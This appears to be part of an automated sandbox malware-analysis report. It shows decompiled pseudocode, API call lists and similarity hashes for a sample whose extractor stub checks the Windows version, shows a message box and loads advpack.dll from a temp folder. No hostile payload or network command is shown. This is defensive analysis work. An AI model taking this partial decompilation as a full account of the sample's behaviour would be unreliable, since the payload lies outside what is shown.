								_t98 = E010B67C9(_t124, _t124);
								__eflags = _t98;
								if(_t98 == 0) {
									goto L57;
								}
								goto L58;
							}
						}
						__eflags = _t138 - 0x54c;
						if(_t138 == 0x54c) {
							goto L30;
						}
						__eflags = _t138;
                                                                                                                                                                                                                                    										if(_t138 == 0) {
                                                                                                                                                                                                                                    											goto L66;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t135 = 0;
                                                                                                                                                                                                                                    										__eflags = 0;
                                                                                                                                                                                                                                    										goto L44;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									L37:
                                                                                                                                                                                                                                    									_t129 = _v432;
                                                                                                                                                                                                                                    									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                    									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t133 =  &_v268;
                                                                                                                                                                                                                                    									_t104 = E010B28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                    									__eflags = _t104;
                                                                                                                                                                                                                                    									if(_t104 != 0) {
                                                                                                                                                                                                                                    										goto L66;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t135 = _v428;
                                                                                                                                                                                                                                    									_t133 = 0x54d;
                                                                                                                                                                                                                                    									_t138 = 0x54d;
                                                                                                                                                                                                                                    									goto L40;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L33;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                                                    							if(_t91 > 0) {
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                                                    							if(_t123 != 0) {
                                                                                                                                                                                                                                    								__eflags = _t91;
                                                                                                                                                                                                                                    								if(_t91 != 0) {
                                                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                                                    								__eflags = _t135;
                                                                                                                                                                                                                                    								if(_t135 == 0) {
                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t138 = 0x54c;
                                                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t91;
                                                                                                                                                                                                                                    							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                    							if(_t91 != 0) {
                                                                                                                                                                                                                                    								_t131 = _v424;
                                                                                                                                                                                                                                    								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                    								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                    							_t109 = _v424;
                                                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                    							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                    							goto L27;
                                                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                                                    							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                    							_v428 = _t135;
                                                                                                                                                                                                                                    							_v420 = _t135;
                                                                                                                                                                                                                                    							__eflags = _t135 - 2;
                                                                                                                                                                                                                                    						} while (_t135 < 2);
                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					__eflags = _t77 == 1;
                                                                                                                                                                                                                                    					if(_t77 == 1) {
                                                                                                                                                                                                                                    						 *0x10b9a40 = _t119;
                                                                                                                                                                                                                                    						 *0x10b8184 = 1;
                                                                                                                                                                                                                                    						 *0x10b8180 = 1;
                                                                                                                                                                                                                                    						__eflags = _t133 - 3;
                                                                                                                                                                                                                                    						if(_t133 > 3) {
                                                                                                                                                                                                                                    							__eflags = _t133 - 5;
                                                                                                                                                                                                                                    							if(_t133 < 5) {
                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t113 = 3;
                                                                                                                                                                                                                                    							_t119 = _t113;
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t119 = 1;
                                                                                                                                                                                                                                    						_t114 = 3;
                                                                                                                                                                                                                                    						 *0x10b9a40 = 1;
                                                                                                                                                                                                                                    						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                    							 *0x10b8184 = _t135;
                                                                                                                                                                                                                                    							 *0x10b8180 = _t135;
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                    						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E010B44B9(0, _t138);
					L66:
					return E010B6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x010b36f9
0x010b3700
0x010b370c
0x010b3716
0x010b3718
0x010b371b
0x010b3721
0x010b372b
0x010b373d
0x010b3745
0x010b3746
0x010b3746
0x010b3749
0x010b37ab
0x010b37ad
0x010b37ae
0x010b37b3
0x010b37b8
0x010b37b8
0x010b37bf
0x010b37bf
0x010b37c5
0x00000000
0x00000000
0x010b37cb
0x010b37cd
0x00000000
0x00000000
0x010b37d5
0x010b37db
0x010b37e8
0x010b37ea
0x010b37ea
0x010b37ea
0x010b37f0
0x010b37f6
0x010b3805
0x010b3817
0x010b382b
0x010b3830
0x010b3836
0x010b383b
0x010b383d
0x010b38eb
0x010b38eb
0x010b38f2
0x010b390c
0x010b3911
0x010b3911
0x010b3913
0x010b394d
0x010b394d
0x010b394f
0x010b38a9
0x010b38a9
0x010b38b0
0x010b38b2
0x010b38b9
0x010b38bb
0x010b38c1
0x010b3975
0x010b38c7
0x010b38de
0x010b38e0
0x010b38e0
0x010b397b
0x010b397d
0x010b39a9
0x010b397f
0x010b3982
0x010b398b
0x010b398d
0x010b398f
0x010b399f
0x010b39a1
0x010b3991
0x010b3991
0x010b3991
0x010b398f
0x010b39af
0x010b39b6
0x010b3a0f
0x010b3a0f
0x010b3a11
0x010b3a13
0x010b3a19
0x00000000
0x010b39b8
0x010b39b8
0x010b39ba
0x00000000
0x00000000
0x010b39bc
0x010b39bf
0x00000000
0x00000000
0x010b39c3
0x010b39c9
0x010b39ce
0x010b39d0
0x010b39e3
0x010b39e5
0x010b39e6
0x010b39f1
0x010b39f7
0x010b39fa
0x010b3a01
0x010b3a04
0x00000000
0x00000000
0x010b3a06
0x010b3a09
0x010b3a09
0x010b3a0b
0x010b3a0b
0x00000000
0x010b3a09
0x010b39fc
0x00000000
0x010b39fc
0x010b39d3
0x010b39d8
0x010b39da
0x00000000
0x00000000
0x00000000
0x010b39dc
0x010b39b6
0x010b3955
0x010b395b
0x00000000
0x00000000
0x010b3961
0x010b3963
0x00000000
0x00000000
0x010b3969
                                                                                                                                                                                                                                    0x010b3969
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3969
                                                                                                                                                                                                                                    0x010b3915
                                                                                                                                                                                                                                    0x010b3915
                                                                                                                                                                                                                                    0x010b391b
                                                                                                                                                                                                                                    0x010b391f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b392d
                                                                                                                                                                                                                                    0x010b3933
                                                                                                                                                                                                                                    0x010b3938
                                                                                                                                                                                                                                    0x010b393a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3940
                                                                                                                                                                                                                                    0x010b3946
                                                                                                                                                                                                                                    0x010b394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38f2
                                                                                                                                                                                                                                    0x010b3843
                                                                                                                                                                                                                                    0x010b3845
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b384b
                                                                                                                                                                                                                                    0x010b384d
                                                                                                                                                                                                                                    0x010b3883
                                                                                                                                                                                                                                    0x010b3885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b389a
                                                                                                                                                                                                                                    0x010b389e
                                                                                                                                                                                                                                    0x010b389e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38a0
                                                                                                                                                                                                                                    0x010b38a0
                                                                                                                                                                                                                                    0x010b38a2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38a4
                                                                                                                                                                                                                                    0x010b384f
                                                                                                                                                                                                                                    0x010b3851
                                                                                                                                                                                                                                    0x010b3857
                                                                                                                                                                                                                                    0x010b386e
                                                                                                                                                                                                                                    0x010b3877
                                                                                                                                                                                                                                    0x010b387b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3881
                                                                                                                                                                                                                                    0x010b3859
                                                                                                                                                                                                                                    0x010b385c
                                                                                                                                                                                                                                    0x010b3862
                                                                                                                                                                                                                                    0x010b3866
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3868
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b38f4
                                                                                                                                                                                                                                    0x010b38f4
                                                                                                                                                                                                                                    0x010b38f5
                                                                                                                                                                                                                                    0x010b38fb
                                                                                                                                                                                                                                    0x010b3901
                                                                                                                                                                                                                                    0x010b3901
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b390a
                                                                                                                                                                                                                                    0x010b374b
                                                                                                                                                                                                                                    0x010b374e
                                                                                                                                                                                                                                    0x010b375c
                                                                                                                                                                                                                                    0x010b3764
                                                                                                                                                                                                                                    0x010b3769
                                                                                                                                                                                                                                    0x010b376e
                                                                                                                                                                                                                                    0x010b3771
                                                                                                                                                                                                                                    0x010b379c
                                                                                                                                                                                                                                    0x010b379f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b37a3
                                                                                                                                                                                                                                    0x010b37a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b37a4
                                                                                                                                                                                                                                    0x010b3773
                                                                                                                                                                                                                                    0x010b3777
                                                                                                                                                                                                                                    0x010b3778
                                                                                                                                                                                                                                    0x010b377f
                                                                                                                                                                                                                                    0x010b3781
                                                                                                                                                                                                                                    0x010b378e
                                                                                                                                                                                                                                    0x010b378e
                                                                                                                                                                                                                                    0x010b3794
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3794
                                                                                                                                                                                                                                    0x010b3783
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3785
                                                                                                                                                                                                                                    0x010b378c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b378c
                                                                                                                                                                                                                                    0x010b3750
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b372d
                                                                                                                                                                                                                                    0x010b372d
                                                                                                                                                                                                                                    0x010b396b
                                                                                                                                                                                                                                    0x010b396b
                                                                                                                                                                                                                                    0x010b396c
                                                                                                                                                                                                                                    0x010b396e
                                                                                                                                                                                                                                    0x010b396f
                                                                                                                                                                                                                                    0x010b3a1e
                                                                                                                                                                                                                                    0x010b3a1e
                                                                                                                                                                                                                                    0x010b3a22
                                                                                                                                                                                                                                    0x010b3a27
                                                                                                                                                                                                                                    0x010b3a3e
                                                                                                                                                                                                                                    0x010b3a3e

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010B3723
• MessageBeep.USER32(00000000), ref: 010B39C3
• MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 010B39F1
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$doza2
• API String ID: 2519184315-2054879145
• Opcode ID: b6c5698fc727746933a753d1c040bdbd8addd82e8ff969e09ec93839ae6e259b
• Instruction ID: 4965a7860cc4769ebb97f1e4ddaab6893757470f56433dacd6739e0c0654133c
• Opcode Fuzzy Hash: b6c5698fc727746933a753d1c040bdbd8addd82e8ff969e09ec93839ae6e259b
• Instruction Fuzzy Hash: 3691D171E012259BEBB58A19CCC1BEABBF4FB85304F2541EAC9C9AF241D7359980CF41
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
E010B6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __edi;
	signed int _t9;
	signed char _t14;
	struct HINSTANCE__* _t15;
	void* _t18;
	CHAR* _t26;
	void* _t27;
	signed int _t28;

	_t27 = __esi;
	_t18 = __ebx;
	_t9 =  *0x10b8004; // 0x72151d89 (likely the /GS security cookie seed)
	_v8 = _t9 ^ _t28; // cookie XORed with the frame pointer and stored in the frame
	_push(__ecx);
	// Build "<temp extraction directory>\advpack.dll" in the 0x104-byte (MAX_PATH) buffer _v268
	E010B1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
	_t26 = "advpack.dll";
	E010B658A( &_v268, 0x104, _t26);
	_t14 = GetFileAttributesA( &_v268);
	// No file at that path (INVALID_FILE_ATTRIBUTES) or the path is a directory
	// (0x10 = FILE_ATTRIBUTE_DIRECTORY): fall back to LoadLibraryA("advpack.dll"),
	// i.e. the normal DLL search order. Otherwise load the copy that was dropped
	// into the extraction directory (8 = LOAD_WITH_ALTERED_SEARCH_PATH).
	if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
		_t15 = LoadLibraryA(_t26);
	} else {
		_t15 = LoadLibraryExA( &_v268, 0, 8);
	}
	// Epilogue helper: likely verifies the stack cookie and returns the module handle in _t15
	return E010B6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
}

APIs
• GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010B64DF
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010B64F9
• LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010B6502
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
• API String ID: 438848745-3761280616
• Opcode ID: 0a5c45466931a6f13155c62d2a9af900fd0ba8a2640b9dd5abf67a1803e32295
• Instruction ID: d4faa3a29464f36640414812b1ee0c43ef19a0d6691eccfe1bcd02f109a5612c
• Opcode Fuzzy Hash: 0a5c45466931a6f13155c62d2a9af900fd0ba8a2640b9dd5abf67a1803e32295
• Instruction Fuzzy Hash: 8201D170A14108ABDBA0DB64ECC8AEE7778EB60310F500299F5C5931C4DF76AE868B50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
	void* _v8;
	char* _v12;
	intOrPtr _v16;
	void* _v20;
	intOrPtr _v24;
	int _v28;
	int _v32;
	void* _v36;
	int _v40;
	void* _v44;
	intOrPtr _v48;
	intOrPtr _v52;
	intOrPtr _v56;
	intOrPtr _v60;
	intOrPtr _v64;
	long _t68;
	void* _t70;
	void* _t73;
	void* _t79;
	void* _t83;
	void* _t87;
	void* _t88;
	intOrPtr _t93;
	intOrPtr _t97;
	intOrPtr _t99;
	int _t101;
	void* _t103;
	void* _t106;
	void* _t109;
	void* _t110;

	_v12 = __edx;
	_t99 = __ecx;
	_t106 = 0;
	_v16 = __ecx;
	_t87 = 0;
	_t103 = 0;
	_v20 = 0;
	if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
		L19:
		_t106 = 1;
	} else {
		_t62 = 0;
		_v8 = 0;
                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                    						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                    						if(E010B2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                    						_v28 = _t68;
                                                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                                                    							_t99 = _v16;
                                                                                                                                                                                                                                    							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                    							_t93 = _v24;
                                                                                                                                                                                                                                    							_t87 = _v20;
                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                                                    								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                    								_v36 = _t73;
                                                                                                                                                                                                                                    								if(_t73 != 0) {
                                                                                                                                                                                                                                    									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                    										L15:
                                                                                                                                                                                                                                    										GlobalUnlock(_t103);
                                                                                                                                                                                                                                    										_t99 = _v16;
                                                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                                                    										_t87 = _t87 + 1;
                                                                                                                                                                                                                                    										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                    										_v20 = _t87;
                                                                                                                                                                                                                                    										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                    										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L19;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t79 = _v44;
                                                                                                                                                                                                                                    										_t88 = _t106;
                                                                                                                                                                                                                                    										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                    										_t101 = _v28;
                                                                                                                                                                                                                                    										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                    										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                    										_t97 = _v48;
                                                                                                                                                                                                                                    										_v36 = _t83;
                                                                                                                                                                                                                                    										_t109 = _t83;
                                                                                                                                                                                                                                    										do {
                                                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010B2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010B2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                    											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                    											_t88 = _t88 + 4;
                                                                                                                                                                                                                                    										} while (_t88 < 8);
                                                                                                                                                                                                                                    										_t87 = _v20;
                                                                                                                                                                                                                                    										_t106 = 0;
                                                                                                                                                                                                                                    										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                    											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                    												GlobalUnlock(_t103);
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												goto L15;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L15;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                                                    				 *_a8 = _t87;
                                                                                                                                                                                                                                    				if(_t103 != 0) {
                                                                                                                                                                                                                                    					GlobalFree(_t103);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t106;
                                                                                                                                                                                                                                    			}

































0x010b28f1
0x010b28f4
0x010b28f7
0x010b28f9
0x010b28fc
0x010b28ff
0x010b2901
0x010b2907
0x010b2a62
0x010b2a64
0x010b290d
0x010b290d
0x010b290f
0x010b2912
0x010b2920
0x010b2937
0x00000000
0x00000000
0x010b2944
0x010b294a
0x010b294f
0x010b2a2f
0x010b2a32
0x010b2a34
0x010b2a37
0x010b2a41
0x00000000
0x00000000
0x010b2955
0x010b295e
0x010b2962
0x010b2969
0x010b296f
0x010b2974
0x010b298c
0x010b2a20
0x010b2a21
0x010b2a27
0x010b2a4c
0x010b2a4f
0x010b2a50
0x010b2a53
0x010b2a56
0x010b2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x010b29b2
0x010b29b2
0x010b29b5
0x010b29bd
                                                                                                                                                                                                                                    0x010b29c3
                                                                                                                                                                                                                                    0x010b29cc
                                                                                                                                                                                                                                    0x010b29d5
                                                                                                                                                                                                                                    0x010b29d7
                                                                                                                                                                                                                                    0x010b29da
                                                                                                                                                                                                                                    0x010b29dd
                                                                                                                                                                                                                                    0x010b29df
                                                                                                                                                                                                                                    0x010b29ec
                                                                                                                                                                                                                                    0x010b29f8
                                                                                                                                                                                                                                    0x010b29fc
                                                                                                                                                                                                                                    0x010b29ff
                                                                                                                                                                                                                                    0x010b2a02
                                                                                                                                                                                                                                    0x010b2a07
                                                                                                                                                                                                                                    0x010b2a0a
                                                                                                                                                                                                                                    0x010b2a0f
                                                                                                                                                                                                                                    0x010b2a19
                                                                                                                                                                                                                                    0x010b2a81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2a0f
                                                                                                                                                                                                                                    0x010b298c
                                                                                                                                                                                                                                    0x010b2974
                                                                                                                                                                                                                                    0x010b2962
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b294f
                                                                                                                                                                                                                                    0x010b2912
                                                                                                                                                                                                                                    0x010b2a65
                                                                                                                                                                                                                                    0x010b2a68
                                                                                                                                                                                                                                    0x010b2a6c
                                                                                                                                                                                                                                    0x010b2a6f
                                                                                                                                                                                                                                    0x010b2a6f
                                                                                                                                                                                                                                    0x010b2a7d

APIs
• GlobalFree.KERNEL32 ref: 010B2A6F
  • Part of subcall function 010B2773: CharUpperA.USER32(72151D89,00000000,00000000,00000000), ref: 010B27A8
  • Part of subcall function 010B2773: CharNextA.USER32(0000054D), ref: 010B27B5
  • Part of subcall function 010B2773: CharNextA.USER32(00000000), ref: 010B27BC
  • Part of subcall function 010B2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2829
  • Part of subcall function 010B2773: RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2852
  • Part of subcall function 010B2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2870
  • Part of subcall function 010B2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B28A0
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010B3938,?,?,?,?,-00000005), ref: 010B2958
• GlobalLock.KERNEL32 ref: 010B2969
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010B3938,?,?,?,?,-00000005,?), ref: 010B2A21
• GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010B2A81
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
• String ID:
• API String ID: 3949799724-0
• Opcode ID: 50bcafa2eb575a1044ff8f3edac7797f69aed8d0e1545314cc81ec67e03e0ee2
• Instruction ID: cb45880d1b7669969440f06c00b210cdb7b1ad23c9ed73ed95d42d918294c098
• Opcode Fuzzy Hash: 50bcafa2eb575a1044ff8f3edac7797f69aed8d0e1545314cc81ec67e03e0ee2
• Instruction Fuzzy Hash: 9D512931E00219EBDB22DF98D8C4AEEBBB5FF48700F14416AE995E7211DB35A941CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B47E0(intOrPtr* __ecx) {
	intOrPtr _t6;
	intOrPtr _t9;
	void* _t11;
	void* _t19;
	intOrPtr* _t22;
	void _t24;
	struct HWND__* _t25;
	struct HWND__* _t26;
	void* _t27;
	intOrPtr* _t28;
	intOrPtr* _t33;
	void* _t34;

	_t33 = __ecx;                                   // __ecx: NUL-terminated string to be recorded
	_t34 = LocalAlloc(0x40, 8);                     // 0x40 = LPTR (fixed, zero-initialised): 8-byte node {string ptr, next ptr}
	if(_t34 != 0) {
		_t22 = _t33;
		_t27 = _t22 + 1;
		do {                                        // inline strlen: advance to the terminating NUL
			_t6 =  *_t22;
			_t22 = _t22 + 1;
		} while (_t6 != 0);
		_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);   // buffer for the copy: string length plus NUL
		 *_t34 = _t24;                              // node->string = buffer
		if(_t24 != 0) {
			_t28 = _t33;
